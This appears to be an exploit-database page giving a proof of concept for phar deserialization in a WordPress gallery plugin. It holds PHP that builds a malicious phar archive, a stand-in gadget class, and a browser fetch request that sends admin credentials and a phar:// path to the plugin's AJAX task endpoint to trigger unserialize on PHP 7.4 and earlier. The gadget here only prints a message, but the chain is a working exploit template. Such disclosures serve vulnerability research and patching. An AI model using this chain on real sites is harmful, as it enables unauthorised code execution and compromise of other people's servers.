## https://sploitus.com/exploit?id=WPEX-ID:ED099489-1DB4-4B42-9F72-77DE39C9E01E
1. Ensure your WordPress installation is using PHP version 7.4 or earlier (PHP 8.0 stopped automatically unserializing phar metadata during `phar://` file operations, so the sink used in step 5 is not reachable on 8.x).
2. Create a Gallery and note its ID.
3. Create a `poc.phar` file using the following code, and add it to the root directory of the server:
<?php
// Marker class whose serialized form is stored as the archive's metadata below; it has no behaviour of its own.
class Evil
{
}
// Builds poc.phar with a serialized Evil instance in its metadata. Writing a phar
// typically needs phar.readonly=0; otherwise the constructor throws and only the
// exception message is printed.
$archivePath = 'poc.phar';
try {
    // Remove any archive left over from a previous run before building a new one.
    if (file_exists($archivePath)) {
        unlink($archivePath);
    }

    $archive = new Phar($archivePath);
    $archive->startBuffering();
    $archive->addFromString('test.txt', 'text');
    $archive->setStub('<?php __HALT_COMPILER(); ?>');
    // The metadata is stored serialized in the archive manifest. On PHP < 8.0 a
    // phar:// stream file operation unserializes it, which is the sink that step 5
    // reaches; PHP 8.0+ no longer does this automatically.
    $archive->setMetadata(new Evil());
    $archive->stopBuffering();
    echo "$archivePath successfully created" . PHP_EOL;
} catch (Exception $error) {
    echo $error->getMessage();
}
4. Add the following class definition to the server so that it stands in for a deserialization gadget:
// Stand-in gadget: __wakeup runs whenever an Evil instance is unserialized, so the
// die() message is direct evidence that attacker-controlled data reached unserialize().
class Evil
{
    public function __wakeup()
    {
        die('Arbitrary deserialization');
    }
}
5. Run the following code in your browser's JavaScript console to observe the deserialization, substituting ADMIN_USERNAME, ADMIN_PASSWORD, and GALLERY_ID with the values for your test installation.
// Same request as the plugin's own AJAX front controller receives; credentials: "include"
// sends the existing session cookie, and the q/z fields carry the admin login in the body.
const requestOptions = {
    "credentials": "include",
    "headers": {
        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
    },
    // extra_data.tmp_name is a phar:// path. The server-side file operation on that
    // path is what unserializes the archive metadata on PHP < 8.0 (see step 1).
    "body": 'photocrati_ajax=1&action=enqueue_nextgen_api_task_list&q=ADMIN_USERNAME&z=ADMIN_PASSWORD&app_config={}&task_list=[{"type":"gallery_edit","query":{"id":"GALLERY_ID"},"object":{"image_list":[{"action":"upload","data_key":"a","filename":"xxxxxxx.jpg"}]}}]&extra_data={"a":{"tmp_name":"phar://poc.phar/tmp.png"}}',
    "method": "POST",
    "mode": "cors"
};
const response = await fetch("/index.php", requestOptions);
await response.text();